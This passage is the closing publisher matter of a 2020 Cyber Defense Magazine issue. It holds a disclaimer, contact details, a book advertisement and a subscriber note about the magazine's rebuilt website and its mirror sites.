except in the case of brief quotations embodied in critical articles and reviews. Because of the dynamic nature of<br />
the Internet, any Web addresses or links contained in this newsletter may have changed since publication and may<br />
no longer be valid. The views expressed in this work are solely those of the author and do not necessarily reflect<br />
the views of the publisher, and the publisher hereby disclaims any responsibility for them. Send us great content<br />
and we’ll post it in the magazine for free, subject to editorial approval and layout. Email us at<br />
marketing@cyberdefensemagazine.com<br />
<strong>Cyber</strong> <strong>Defense</strong> Magazine<br />
276 Fifth Avenue, Suite 704, New York, NY 1000<br />
EIN: 454-18-8465, DUNS# 078358935.<br />
All rights reserved worldwide.<br />
marketing@cyberdefensemagazine.com<br />
www.cyberdefensemagazine.com<br />
NEW YORK (US HQ), LONDON (UK/EU), HONG KONG (ASIA)<br />
<strong>Cyber</strong> <strong>Defense</strong> Magazine - <strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> rev. date: 07/01/<strong>2020</strong><br />
TRILLIONS ARE AT STAKE<br />
No 1 INTERNATIONAL BESTSELLER IN FOUR CATEGORIES<br />
Released:<br />
https://www.amazon.com/Cryptoconomy-Bitcoins-Blockchains-Bad-Guys-ebook/dp/B07KPNS9NH<br />
In Development:<br />
8 Years in The Making…<br />
Thank You to our Loyal Subscribers!<br />
We've Completely Rebuilt <strong>Cyber</strong><strong>Defense</strong>Magazine.com - Please Let Us Know<br />
What You Think. It's mobile and tablet friendly and superfast. We hope you<br />
like it. In addition, we're shooting for 7x24x365 uptime as we continue to<br />
scale with improved Web App Firewalls, Content Deliver Networks (CDNs)<br />
around the Globe, Faster and More Secure DNS<br />
and <strong>Cyber</strong><strong>Defense</strong>MagazineBackup.com up and running as an array of live<br />
mirror sites.<br />
Millions of monthly readers and new platforms coming…<br />